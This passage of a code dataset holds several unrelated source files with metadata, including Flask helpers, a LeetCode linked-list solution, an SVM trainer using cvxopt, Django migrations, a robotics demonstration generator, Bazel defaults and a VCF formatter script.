'hour'),\n (60, 'minute'),\n (1, 'second')\n )\n\n if not now:\n now = datetime.datetime.now().replace(tzinfo=time.tzinfo)\n\n delta = now - (time - datetime.timedelta(0, 0, time.microsecond))\n since = delta.days * 24 * 60 * 60 + delta.seconds\n if since <= 0:\n return 'in the future'\n for i, (seconds, name) in enumerate(chunks):\n count = since // seconds\n if count != 0:\n break\n\n if count > 1:\n name += 's'\n\n return '%(number)d %(type)s ago' % {'number': count, 'type': 
name}\n\n\n@app.template_filter('bignum')\ndef bignum(num):\n    magnitude = 0\n    while abs(num) >= 1000:\n        magnitude += 1\n        num /= 1000.0\n    # add more suffixes if you need them\n    return '%.2f%s' % (num, ['', 'K', 'M'][magnitude]) if magnitude > 0 else num\n\n\n@app.context_processor\ndef periods():\n    return {'PERIODS': PERIODS}\n\n\n@app.context_processor\ndef project_version():\n    return {'PROJECT_VERSION': __VERSION__}\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n    return db.session.query(User).get(user_id)\n\n\ndef show_form_errors(form):\n    for field, errors in form.errors.items():\n        for error in errors:\n            flash(u\"<b>{}</b>: {}\".format(getattr(form, field).label.text, error), 'error')\n\n\ndef get_argument(arg_name, arg_type=None, default=0):\n    arg_type = arg_type or int\n\n    try:\n        return arg_type(request.args.get(arg_name))\n    except (TypeError, ValueError):\n        return default\n\n\ndef range_to_datetime(s_from, s_to):\n    try:\n        dt_from = datetime.datetime.strptime(s_from, '%Y-%m-%d')\n    except ValueError:\n        dt_from = datetime.datetime.strptime(s_from, '%Y-%m-%d %H:%M:%S')\n\n    try:\n        dt_to = datetime.datetime.strptime(s_to, '%Y-%m-%d')\n        dt_to = dt_to + datetime.timedelta(days=1) - datetime.timedelta(microseconds=1)\n    except ValueError:\n        dt_to = datetime.datetime.strptime(s_to, '%Y-%m-%d %H:%M:%S')\n\n    return (dt_from, dt_to)\n","sub_path":"scrobbler/webui/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}{"seq_id":"183635706","text":"\"\"\"\nGiven two (singly linked) lists, determine whether they intersect and return the intersecting node. Note that intersection is defined by node reference, not node value. In other words, the two lists intersect if the k-th node of one list and the j-th node of the other list are the very same node (identical reference).\n\nExample 1:\n Input: intersectVal = 8, listA = [4,1,8,4,5], listB = [5,0,1,8,4,5], skipA = 2, skipB = 3\n Output: Reference of the node with value = 8\n Explanation: The value of the intersecting node is 8 (note that it cannot be 0 if the two lists intersect). Counting from their heads, list A is [4,1,8,4,5] and list B is [5,0,1,8,4,5]. In A there are 2 nodes before the intersection; in B there are 3 nodes before it.\n\nExample 2:\n Input: intersectVal = 2, listA = [0,9,1,2,4], listB = [3,2,4], skipA = 3, skipB = 1\n Output: Reference of the node with value = 2\n Explanation: The value of the intersecting node is 2 (note that it cannot be 0 if the two lists intersect). Counting from their heads, list A is [0,9,1,2,4] and list B is [3,2,4]. In A there are 3 nodes before the intersection; in B there is 1 node before it.\n\nExample 3:\n Input: intersectVal = 0, listA = [2,6,4], listB = [1,5], skipA = 3, skipB = 2\n Output: null\n Explanation: Counting from their heads, list A is [2,6,4] and list B is [1,5]. Since the two lists do not intersect, intersectVal must be 0, while skipA and skipB can be arbitrary values.\n The two lists do not intersect, so null is returned.\n\nNotes:\n If the two lists have no intersection, return null.\n After the result is returned, both lists must keep their original structure.\n You may assume there are no cycles anywhere in the linked structure.\n The program should preferably run in O(n) time and use only O(1) memory.\n\nSource: LeetCode (LCCI)\nLink: https://leetcode-cn.com/problems/intersection-of-two-linked-lists-lcci\nCopyright belongs to LeetCode-cn. For commercial reprints please contact them for official authorization; for non-commercial reprints please credit the source.\n\"\"\"\nclass ListNode(object):\n    def __init__(self, x):\n        self.val = x\n        self.next = None\n\n\ndef NodeListBuilder(nums):\n    if len(nums) == 0:\n        return None\n    else:\n        head = ListNode(nums[0])\n        last = head\n        for i in range(1, len(nums)):\n            new_node = ListNode(nums[i])\n            last.next = new_node\n            last = new_node\n        return head\n\n\ndef NodeListPrinter(head):\n    node_list = []\n    while head != None:\n        node_list.append(str(head.val))\n        head = head.next\n    return ('->').join(node_list)\n\n\ndef getIntersectionNode(headA, headB):\n    # walk both lists to get their lengths and tail-node references\n    if headA == None or headB == None:\n        return None\n    l1 = 1\n    p1 = headA\n    while p1.next != None:\n        l1 += 1\n        p1 = p1.next\n\n    l2 = 1\n    p2 = headB\n    while p2.next != None:\n        l2 += 1\n        p2 = p2.next\n\n    pa = headA\n    pb = headB\n\n    # if the tails are the same node, the lists intersect\n    if p1 == p2:\n        if l1 > l2:\n            for i in range(l1 - l2):\n                pa = pa.next\n        elif l2 
> l1:\n            for i in range(l2 - l1):\n                pb = pb.next\n        while pa != None and pb != None:\n            if pa == pb:\n                return pa\n            else:\n                pa = pa.next\n                pb = pb.next\n        return None\n    else:\n        return None\n\n\nlist_common = NodeListBuilder([8, 4, 5])\n\nlistA = ListNode(4)\nnode1 = ListNode(1)\nlistA.next = node1\nnode1.next = list_common\n\nlistB = ListNode(5)\nnode2 = ListNode(0)\nnode3 = ListNode(1)\nlistB.next = node2\nnode2.next = node3\nnode3.next = list_common\n\nprint(NodeListPrinter(getIntersectionNode(listA, listB)))\n\n","sub_path":"程序员面试金典/02.07. 链表相交.py","file_name":"02.07. 链表相交.py","file_ext":"py","file_size_in_byte":3722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}{"seq_id":"572752676","text":"def swap (var1, var2):\n    print(var2+\",\"+var1+\". Hello!\")\n    return\n    \ndef pig (var1, var2):\n    print(var1[1:] + var1[0] + \"ay\", end = \" \")\n    print(var2[1:] + var2[0] + \"ay\", end = \" \")\n    return\n\nfirstname = input(\"Please enter your first name:\")\nlastname = input(\"Please enter your last name:\")\nswap(firstname,lastname)\nanswer = input(\"Would you like your name displayed in Pig Latin?\")\nif (answer.lower() == \"yes\"):\n    pig(firstname,lastname)\nelse:\n    print(\"Have a wonderful day \"+firstname+\",\"+lastname)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}{"seq_id":"236908142","text":"\"\"\"\n1. Build a report on each of the known criminals: load the information from the file into the following structure:\na dictionary whose keys are the criminals' names, where each name maps to\na list of all their deeds, each of which is a dictionary\n\nThen print this dictionary to the screen using the json module\n\n(Combine the deeds of unknown criminals into one list and store it in the dictionary under the key \"-\")\n\n10 points\n10 minutes\n\"\"\"\nfrom json import loads,dumps\ndct = {}\nwith open(\"Crimes.csv\", \"r\") as file:\n    keys = file.readline().strip(\"\\n\").split(\",\")\n    print(keys)\n    for line in file:\n        lst = line.strip(\"\\n\").split(\",\")\n        print(lst)\n        if lst[5] not in dct:\n            dct[lst[5]] = []\n        for i in range(9):\n            try:\n                lst[i] = int(lst[i])\n            except ValueError:\n                pass\n        dct[lst[5]].append({\n            keys[0]: lst[0],\n            keys[1]: lst[1],\n            keys[2]: lst[2],\n            keys[3]: lst[3],\n            keys[4]: lst[4],\n            keys[6]: lst[6],\n            keys[7]: lst[7],\n            keys[8]: lst[8]\n        })\nwith open(\"Info.txt\", \"w\") as file:\n    file.write(dumps(dct))\nprint(dumps(dct, indent=4))","sub_path":"The crimes/Task_1.py","file_name":"Task_1.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}{"seq_id":"422193122","text":"from flask import (\n    Blueprint, flash, g, redirect, session, render_template, request, url_for\n)\nfrom werkzeug.exceptions import abort\n\nfrom fedsdm.auth import login_required\nfrom fedsdm.db import get_db\nfrom fedsdm.ui.utils import get_mtconns, get_num_properties, get_num_rdfmts, get_datasources, get_federations\n\nbp = Blueprint('dashboard', __name__)\n\n\n@bp.route('/')\n@login_required\ndef stats():\n    db = get_db()\n    # feds = db.execute(\n    #     'SELECT f.uri as feduri'\n    #     ' FROM federation f '\n    #     ' JOIN user u ON f.owner_id = u.id '\n    # ).fetchall()\n\n    sourceids = []\n    datasources = {}\n    rdfmts = 0\n    links = 0\n    stats = {}\n    feds = get_federations(g.default_graph)\n    if 'fed' in session:\n        if session['fed'] not in [f['uri'] 
for f in feds]:\n del session['fed']\n for f in feds:\n graph = f['uri']\n dss = get_datasources(graph)\n datasources.update(dss)\n sourceids.extend(list(dss.keys()))\n mts = get_num_rdfmts(graph)\n rdfmts += mts\n lks = get_mtconns(graph)\n links += lks\n stats[f['uri']] = []\n for s in list(dss.keys()):\n nummts = get_num_rdfmts(graph, s)\n datasources[s]['rdfmts'] = nummts\n props = get_num_properties(graph, s)\n datasources[s]['properties'] = props\n linkss = get_mtconns(graph, s)\n datasources[s]['links'] = linkss\n stat = {\"rdfmts\": nummts,\n \"links\": linkss,\n \"triples\": datasources[s]['triples'] if 'triples' in datasources[s] else -1,\n \"properties\": props,\n \"source\": datasources[s]['source']}\n stats[f['uri']].append(stat)\n\n\n stat = {\n \"rdfmts\": rdfmts,\n \"sources\": len(set(sourceids)),\n \"federations\": len(feds),\n \"links\": links}\n\n datasourcesstat = list(datasources.values())\n\n g.stats = stats\n\n return render_template('dashboard/index.html', dsstats=datasourcesstat,\n fedstats=stat)\n\n","sub_path":"fedsdm/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"463478439","text":"import numpy as np\nfrom cvxopt import matrix\nfrom cvxopt import solvers\nimport csv\nimport time\nfrom numpy import linalg as la\nimport math\n# from svmutil import *\nimport sys\nimport sklearn.metrics\n# X = []\n# Y = []\n# X_test = []\n# Y_test = []\n\ntrain = sys.argv[1]\ntest = sys.argv[2]\npart = sys.argv[3]\n\n# time_gap = float(sys.argv[4])\n\n\n\nXq1 = []\nYq1 = []\nXq1_test = []\nYq1_test = []\n\nnum = 5\n\nstart1 = time.time()\n\n# train = \"mnist/train.csv\"\n# test = \"mnist/test.csv\"\n\nwith open(train) as fileX:\n\tx_reader = csv.reader(fileX)\n\tfor row in x_reader:\n\t\tif float(row[784])==num or float(row[784])==num+1: \n\t\t\ttemp = []\n\t\t\tfor i in range(784):\n\t\t\t\ttemp.append(float(row[i])/255)\n\t\t\t# Y.append(float(row[784]))\n\t\t\t# X.append(temp)\n\t\t\tif(float(row[784])==num):\n\t\t\t\tYq1.append(1)\n\t\t\t\tXq1.append(temp)\n\t\t\tif(float(row[784])==num+1):\n\t\t\t\tYq1.append(-1)\n\t\t\t\tXq1.append(temp)\n\nwith open(test) as fileX:\n\tx_reader = csv.reader(fileX)\n\tfor row in x_reader:\n\t\tif float(row[784])==num or float(row[784])==num+1: \n\t\t\ttemp = []\n\t\t\tfor i in range(784):\n\t\t\t\ttemp.append(float(row[i])/255)\n\t\t\t# Y.append(float(row[784]))\n\t\t\t# X.append(temp)\n\t\t\tif(float(row[784])==num):\n\t\t\t\tYq1_test.append(1)\n\t\t\t\tXq1_test.append(temp)\n\t\t\tif(float(row[784])==num+1):\n\t\t\t\tYq1_test.append(-1)\n\t\t\t\tXq1_test.append(temp)\n\nend1 = time.time()\nprint(\"Input done, Time taken\", end1-start1)\nstart2 = time.time()\nalpha_count = len(Xq1)\n\n\n# if(part==\"c\"):\n# \tx_svm, y_svm = Xq1, Yq1\n\n# \tprob = svm_problem(y_svm, x_svm)\n# \tparam = svm_parameter('-t 2 -c 1 -b 0 -g 0.05 -q')\n# \tm = svm_train(prob, param, '-q')\n# \tp_label, p_acc, p_val = svm_predict(Yq1_test, Xq1_test, m, '-b 0 -q')\n# \t# print(\"Accuracy using LIBSVM: \", p_acc)\n# \tACC, MSE, SCC = evaluations(Yq1_test, p_label)\n# \tprint(\"Accuracy using LIBSVM: \", ACC)\n# \talpha_libsvm = m.get_sv_coef()\n# \tSV_indices = m.get_sv_indices()\n# \talpha_svm = []\n# \tj=0\n# \tfor i in range(len(Yq1_test)):\n# \t\tif(i==SV_indices[j]):\n# \t\t\talpha_svm.append(alpha_libsvm[j][0])\n# \t\t\tj+=1\n# \t\telse:\n# \t\t\talpha_svm.append(0)\n\n# \t# exit(0)\n# \t# return \n\n# print(len(Xq1))\n# 
print(len(Yq1))\n# print(len(Xq1_test))\n# print(len(Yq1_test))\n\ndef linear_kernel(x,y):\n\treturn np.inner(x,y)\n\ngamma = 0.05\n\ndef guassian_kernel(x,y):\n\ttempmat = np.zeros((alpha_count, alpha_count))\n\tfor i in range(alpha_count):\n\t\tfor j in range(i, alpha_count):\n\t\t\tnormsq = (la.norm(np.array(Xq1[i])- np.array(Xq1[j])))\n\t\t\ttempmat[i][j] = np.exp((-1)*((normsq**2)*(gamma)))\n\t\t\ttempmat[j][i] = tempmat[i][j]\n\treturn tempmat\n\ndef guas(x,z):\n\tnormsq = (la.norm(np.array(x)- np.array(z)))\n\treturn math.exp((-1)*((normsq**2)*(gamma)))\n\t\t\t\n\n# alpha_count = 10\n#######################################################\nq1 = np.ones((alpha_count, 1))*-1\n#######################################################\n# P1 = np.zeros((alpha_count, alpha_count))\n# for i in range(alpha_count):\n# \tfor j in range(i, alpha_count):\n# \t\tP1[i][j]=Yq1[i]*Yq1[j]*np.inner(Xq1[i],Xq1[j])\n# \t\tP1[j][i] = P1[i][j]\nmatXq1 = np.array(Xq1)\nmatYq1 = np.array([Yq1])\nif(part==\"a\"):\n\tP1 = linear_kernel(matXq1, matXq1)\nelif(part==\"b\"):\n\t# P1 = guassian_kernel(matXq1, matXq1)\n\tP1 = sklearn.metrics.pairwise.rbf_kernel(Xq1, Xq1, gamma=0.05)\n\nP1 = P1*((matYq1.transpose()).dot(matYq1))\n# print(matY)\n\n# print(\"inner product done\")\n#######################################################\nA1 = np.zeros((1,alpha_count))\nfor i in range(alpha_count):\n\tA1[0][i] = Yq1[i] \n\n#######################################################\ntemp1 = np.identity(alpha_count)*(-1)\ntemp2 = np.identity(alpha_count)\nG1 = np.concatenate((temp1, temp2), axis=0)\n\n#######################################################\nC = 1.0\ntemp1 = np.zeros((alpha_count,1))\ntemp2 = np.ones((alpha_count,1))*C\nh1 = np.concatenate((temp1, temp2), axis=0)\n#######################################################\n# b1 = np.array([[0]])\nb1 = np.zeros((1,1))\n# print(b1.shape)\n\nP = matrix(P1)\nq = matrix(q1)\nG = matrix(G1)\nh = matrix(h1)\nA = matrix(A1)\nb = matrix(b1)\n\n\nend2 = time.time()\nprint(\"Matrices Made, Time taken\", end2-start2)\n\nsolvers.options[\"show_progress\"] = False\n\nstart3 = time.time()\nsolution = solvers.qp(P,q,G,h,A,b)\n# print(solution['status'])\n# print(solution['x'])\nalphas_q1 = np.array(solution['x'])\n# print(solution['primal objective'])\n\nend3 = time.time()\nprint(\"Solved, Time taken\", end3-start3)\n\n# print(len(Xq1))\n# print(matXq1.shape)\n# print(alphas_q1)\nSV = []\nfor i in range(alphas_q1.shape[0]):\n\tif alphas_q1[i][0]<C and alphas_q1[i][0]>1e-5:\n\t\tSV.append(i)\n\n\n\n\nWq1 = (matXq1.transpose()).dot(alphas_q1*(matYq1.transpose()))\nbq1 = Yq1[SV[0]] - (Wq1.transpose().dot(matXq1[SV[0]])) \n\n# print(\"w\")\n# print(Wq1)\n# print(\"b\")\n# print(bq1)\n# print(SV)\n\nmatXq1_test = np.array(Xq1_test)\nmatYq1_test = np.array([Yq1_test]).transpose()\n\nmatXq1 = np.array(Xq1)\nmatYq1 = np.array([Yq1]).transpose()\n\n\nif(part==\"a\"):\n\tpredictionYq1_test = matXq1_test.dot(Wq1) + bq1\n\tpredictionYq1_train = matXq1.dot(Wq1) + bq1\n\n\tcount_test = 0\n\tfor i in range(len(Yq1_test)):\n\t\tpred =0\n\t\tif(predictionYq1_test[i][0]>=0):\n\t\t\tpred = 1\n\t\telse:\n\t\t\tpred = -1\n\t\tif(pred==Yq1_test[i]):\n\t\t\tcount_test+=1\n\n\n\t# count_train = 0\n\t# for i in range(len(Yq1)):\n\t# \tpred =0\n\t# \tif(predictionYq1_train[i][0]>=0):\n\t# \t\tpred = 1\n\t# \telse:\n\t# \t\tpred = -1\n\t# \tif(pred==Yq1[i]):\n\t# \t\tcount_train+=1\n\n\n\tprint(\"No. 
of Support Vectors: \", len(SV))\n\n\tprint(\"Total correct(in test): \", count_test)\n\tprint(\"Total test(in test): \", len(Yq1_test))\n\tprint(\"Accuracy using Linear kernel(test set): \", count_test/len(Yq1_test)*100)\n\n\n\t# print(\"Total correct(in train): \", count_train)\n\t# print(\"Total test(in train): \", len(Yq1))\n\t# print(\"Accuracy using Linear kernel(training set): \", count_train/len(Yq1)*100)\n\t# print(\"No. of Support Vectors: \", len(SV))\n\nif(part==\"b\"):\n\tpredictionYq1_gaus = []\n\n\ttemp_x_guas = []\n\ttemp_alpha_y = []\n\n\tfor j in range(len(SV)):\n\t\tkernel = guas(Xq1[SV[j]], Xq1[SV[0]])\n\t\ttemp_x_guas.append(kernel)\n\t\ttemp_alpha_y.append(alphas_q1[SV[j]]*Yq1[SV[j]])\n\n\ttemp_row = np.array([temp_x_guas])\n\ttemp_col = np.array([temp_alpha_y]).transpose()\n\tb_gaus = Yq1[SV[0]] - temp_row.dot(temp_col) \n\t# print(\"b for guassian\", b_gaus)\n\n\n\tfor i in range(len(Yq1_test)):\n\t\tx_guas = []\n\t\talpha_y = []\n\t\tfor j in range(len(SV)):\n\t\t\tkernel = guas(Xq1[SV[j]], Xq1_test[i])\n\t\t\tx_guas.append(kernel)\n\t\t\talpha_y.append(alphas_q1[SV[j]]*Yq1[SV[j]])\n\t\ttemp_row = np.array([x_guas])\n\t\ttemp_col = np.array([alpha_y]).transpose()\n\t\tpred = temp_row.dot(temp_col) + b_gaus\n\t\t# print(\"Pred: \", pred)\n\t\t# print(\"minus: \", pred-b_gaus)\n\t\tpredictionYq1_gaus.append(pred)\n\n\tcount_gaus = 0\n\tfor i in range(len(Yq1_test)):\n\t\tpred =0\n\t\tif(predictionYq1_gaus[i]>=0):\n\t\t\tpred = 1\n\t\telse:\n\t\t\tpred = -1\n\t\tif(pred==Yq1_test[i]):\n\t\t\tcount_gaus+=1\n\n\tprint(\"Total correct: \", count_gaus)\n\tprint(\"Total test: \", len(Yq1_test))\n\tprint(\"Accuracy using Guassian Kernel: \", (count_gaus/len(Yq1_test))*100)\n\tprint(\"No. of Support Vectors: \", len(SV))\n\n\n\n\n# print(type(alpha_svm))\n# print(type(SV_indices))\n# print((alpha_svm))\n# print((SV_indices))\n","sub_path":"2016CS10355_Sachin_Prajapati/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":6984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"148686848","text":"from django.contrib import admin\nfrom django.urls import path, include\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api/v1/', include([\n path('auth/', include('rest_framework.urls')),\n path('blog/', include('blog.api.urls')),\n ]))\n]\n","sub_path":"app/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"408003396","text":"# -*- coding: utf-8 -*-\n\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('microdevices', '0002'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='OrganModelProtocol',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('version', models.CharField(max_length=20)),\n ('file', models.FileField(upload_to=b'protocols', verbose_name=b'Protocol File')),\n ('organ_model', models.ForeignKey(verbose_name=b'Organ Model', to='microdevices.OrganModel', on_delete=models.CASCADE)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.RemoveField(\n model_name='organmodel',\n name='protocol',\n ),\n migrations.AlterField(\n model_name='organmodel',\n name='device',\n field=models.ForeignKey(to='microdevices.Microdevice', on_delete=models.CASCADE),\n preserve_default=True,\n ),\n migrations.RemoveField(\n 
model_name='microdevice',\n            name='device_fluid_volume_unit',\n        ),\n        migrations.AlterField(\n            model_name='microdevice',\n            name='device_fluid_volume',\n            field=models.FloatField(null=True, verbose_name=b'device fluid volume (uL)', blank=True),\n            preserve_default=True,\n        ),\n        migrations.AlterUniqueTogether(\n            name='organmodelprotocol',\n            unique_together=set([('version', 'organ_model')]),\n        ),\n    ]\n","sub_path":"microdevices/migrations/0003.py","file_name":"0003.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"332819972","text":"from baseline_utils import *\n\nclass GT_Reward_Expert:\n\t\"\"\"\n\tThis class contains an environment with the GT reward and is used to simulate near-optimal demonstrations.\n\n\tInit:\n\tgt_weights\t\tList of weights for the feat_list features\n\tfeat_list\t\tList of strings with the active features\n\tgen\t\t\t\tThe mode used to generate induced near-optimal trajectories under the GT cost;\n\t \t\t\t\tcan be 'waypt' (get TrajOpt optimal trajectory and perturb waypoints)\n\t \t\t\t\tor 'cost' (perturb the cost function slightly and get TrajOpt optimal trajectories for all of them)\n\n\tstarts\t\t\tList of start positions\n\tgoals\t\t\tList of goal positions\n\tgoal_poses\t\tList of goal poses OR default None\n\tcombi\t\t\tIf True: take all combinations of start & goal pairs\n\tT, timestep\t\tSettings for TrajOpt\n\n\tobj_center_dict\tDict of human & laptop positions used when calculating the feature values\n\tfeat_range_dict\tDict of factors for the different features to scale them to 0-1 -> used to calculate feature values\n\n\t\"\"\"\n\n\tdef __init__(self, feat_list, gt_weights, gen, starts, goals, goal_poses=None, combi=False, T=20., timestep=0.5,\n\t\t\t\t obj_center_dict = {'HUMAN_CENTER': [-0.6, -0.55, 0.0], 'LAPTOP_CENTER': [-0.8, 0.0, 0.0]},\n\t\t\t\t feat_range_dict = {'table': 0.98, 'coffee': 1.0, 'laptop': 0.3, 'human': 0.3, 'efficiency': 0.22, 'proxemics': 0.3, 'betweenobjects': 0.2}):\n\n\t\t# instantiate an environment & trajOpt planner\n\t\tenv, planner = init_env(feat_list, gt_weights, object_centers=obj_center_dict, feat_range=feat_range_dict)\n\t\tself.env = env\n\t\tself.planner = planner\n\t\tself.s_g_exp_trajs = []\n\t\tself.gen = gen\n\n\t\tif goal_poses is not None and len(goals) != len(goal_poses):\n\t\t\tprint(\"Goal pose needs to be either None or same length as len(goals)\")\n\t\t\tassert False\n\n\t\tif combi:\n\t\t\tcombis = [(x, y) for x in range(len(starts)) for y in range(len(goals))]\n\t\t\tself.starts = [starts[tup[0]] for tup in combis]\n\t\t\tself.goals = [goals[tup[1]] for tup in combis]\n\t\t\tif goal_poses is not None:\n\t\t\t\tself.goal_poses = [goal_poses[tup[1]] for tup in combis]\n\t\telse:\n\t\t\tself.starts = starts[:min(len(starts), len(goals))]\n\t\t\tself.goals = goals[:min(len(starts), len(goals))]\n\t\t\tif goal_poses is not None:\n\t\t\t\tself.goal_poses = goal_poses\n\n\t\tif goal_poses is None:\n\t\t\tself.goal_poses = [None for _ in range(len(self.starts))]\n\n\t\tself.T = T\n\t\tself.timestep = timestep\n\n\tdef generate_expert_demos(self, n_per_s_g, std=0.01):\n\t\t\"\"\"\n\t\t\tUse trajopt and some perturbation method to generate near-optimal demonstrations under the GT reward\n\t\t\t----\n\t\t\tInput:\n\t\t\tn_per_s_g\thow many demonstrations per start-goal pair\n\t\t\tstd\t\t\tstandard deviation used to induce near-optimality\n\t\t\"\"\"\n\t\tfor start, goal, goal_pose in zip(self.starts, self.goals, 
self.goal_poses):\n\t\t\tif self.gen == 'waypt':\n\t\t\t\texpert_demos = generate_Gaus_MaxEnt_trajs(self.planner, self.env, std,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t n_per_s_g, start, goal, goal_pose, self.T, self.timestep)\n\t\t\telif self.gen == 'cost':\n\t\t\t\texpert_demos = generate_cost_perturb_trajs(self.planner, self.env, std,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t n_per_s_g, start, goal, goal_pose, self.T, self.timestep)\n\t\t\t# add for that s_g configuration\n\t\t\tself.s_g_exp_trajs.append(expert_demos)\n\n\tdef generate_rand_start_goal(self, n_trajs, min_dist=0.7):\n\t\t\"\"\"\n\t\t\tGenerates and adds a random set of start-goal pairs that are at least min_dist apart\n\t\t\t----\n\t\t\tInput:\n\t\t\tn_trajs\t\thow many start-goal pairs\n\t\t\tmin_dist\tminimum distance the start-goal pairs should be apart\n\t\t\"\"\"\n\t\ttrajs = []\n\t\tstarts = []\n\t\tgoals = []\n\t\twhile len(trajs) < n_trajs:\n\t\t\t# sample\n\t\t\tstart_sample = np.random.uniform(low=0, high=2 * math.pi, size=7)\n\t\t\tgoal_sample = np.random.uniform(low=0, high=2 * math.pi, size=7)\n\t\t\t# plan\n\t\t\topt_traj = self.planner.replan(start_sample, goal_sample, None, self.T, self.timestep, seed=None)\n\t\t\t# get raw and x,y,z of start and end of the trajectory\n\t\t\traw = map_to_raw_dim(self.env, [opt_traj.waypts])\n\t\t\tdistance = np.linalg.norm(raw[0][0][88:91] - raw[0][-1][88:91])\n\t\t\tif distance > min_dist:\n\t\t\t\ttrajs.append(raw[0])\n\t\t\t\tstarts.append(start_sample)\n\t\t\t\tgoals.append(goal_sample)\n\t\tself.starts = self.starts + starts\n\t\tself.goals = self.goals + goals\n\t\tself.goal_poses = self.goal_poses + [None]*len(starts)\n\n\tdef return_trajs(self):\n\t\t\"\"\"\n\t\t\tReturns the list of lists of expert demonstrations\n\t\t\"\"\"\n\t\treturn self.s_g_exp_trajs\n\n\tdef load_trajs(self, trajectories):\n\t\t\"\"\"\n\t\t\tLoads in a list of lists of expert demonstrations\n\t\t\"\"\"\n\t\tself.s_g_exp_trajs = trajectories\n\n\tdef plot_trajs(self):\n\t\t\"\"\"\n\t\t\tPlot the current set of expert demonstrations in 3D space, color is the z coordinate.\n\t\t\"\"\"\n\t\tall_trajs = []\n\t\tfor s_g_demos in self.s_g_exp_trajs:\n\t\t\thigh_dim_demos = []\n\t\t\tfor angle_traj in s_g_demos:\n\t\t\t\thigh_dim_demos.append(map_to_raw_dim(self.env, [angle_traj])[0])\n\t\t\tall_trajs = all_trajs + high_dim_demos\n\t\tplot_trajs(all_trajs, object_centers=self.env.object_centers, title='Expert Trajectories')","sub_path":"src/MaxEnt_Baseline/Reward_Expert.py","file_name":"Reward_Expert.py","file_ext":"py","file_size_in_byte":4886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"237009072","text":"\"\"\"Re-export of some bazel rules with repository-wide defaults.\"\"\"\n\nload(\"@build_bazel_rules_nodejs//:defs.bzl\", _npm_package = \"npm_package\")\nload(\"@npm_angular_bazel//:index.bzl\", _ng_module = \"ng_module\", _ng_package = \"ng_package\")\nload(\"@npm_bazel_typescript//:index.bzl\", _ts_library = \"ts_library\")\n\nDEFAULT_TSCONFIG = \"//projects:tsconfig.json\"\nDEFAULT_TSCONFIG_TEST = \"//projects:tsconfig-test.json\"\nNG_VERSION = \"^8.0.0\"\nRXJS_VERSION = \"^6.4.0\"\n\ndef ng_module(name, tsconfig = None, entry_point = None, testonly = False, deps = [], module_name = None, bundle_dts = True, **kwargs):\n \"\"\"Default values for ng_module\"\"\"\n deps = deps + [\"@npm//tslib\"]\n if testonly:\n # Match the types[] in //packages:tsconfig-test.json\n deps.append(\"@npm//@types/node\")\n if not tsconfig and testonly:\n tsconfig = 
DEFAULT_TSCONFIG_TEST\n    if not entry_point:\n        entry_point = \"public_api.ts\"\n\n    _ng_module(\n        name = name,\n        flat_module_out_file = name,\n        tsconfig = tsconfig,\n        entry_point = entry_point,\n        testonly = testonly,\n        bundle_dts = bundle_dts,\n        deps = deps,\n        module_name = module_name,\n        **kwargs\n    )","sub_path":"tools/defaults.bzl","file_name":"defaults.bzl","file_ext":"bzl","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"109516223","text":"\"\"\"Format missense constraint scores as vcf.\"\"\"\nimport argparse\nimport toolshed as ts\n\ndef main(path):\n\n    tmpl = \"{chrom}\\t{pos}\\t.\\t{ref}\\t{alt}\\t1\\tPASS\\tobs_exp={obs_exp};mis_badness={mis_badness};fitted_score={fitted_score};mpc={MPC}\"\n\n    hdr = \"\"\"\\\n##fileformat=VCFv4.1\n##INFO=<ID=obs_exp,Number=1,Type=Float,Description=\"obs_exp\">\n##INFO=<ID=mis_badness,Number=1,Type=Float,Description=\"mis_badness\">\n##INFO=<ID=fitted_score,Number=1,Type=Float,Description=\"Fitted score from our algorithm\">\n##INFO=<ID=mpc,Number=1,Type=Float,Description=\"MPC score (transformed fitted score)\">\n#CHROM POS ID REF ALT QUAL FILTER INFO\"\"\"\n\n    for i, line in enumerate(ts.nopen(path)):\n        if i == 0:\n            print(hdr)\n            header = line.rstrip().split(\"\\t\")\n        else:\n            d = dict(zip(header, line.rstrip().split(\"\\t\")))\n            print( tmpl.format(**d) )\n\nif __name__ == \"__main__\":\n    p = argparse.ArgumentParser()\n    p.add_argument(\"path\")\n    a = p.parse_args()\n\n    main(a.path)\n","sub_path":"mk_constraint_vcf.py","file_name":"mk_constraint_vcf.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"291034344","text":"#Sorts entries based on activity, then creates tsv for each type\n\nimport csv\n\nBlood_cancer = {}\nBlood_healthy = {}\nBreast_cancer = {}\nBreast_healthy = {}\nLiver_cancer = {}\nLiver_healthy = {}\nPancreas_cancer = {}\nPancreas_Healthy = {}\n\nf = open('Allgenes_activity.tsv', 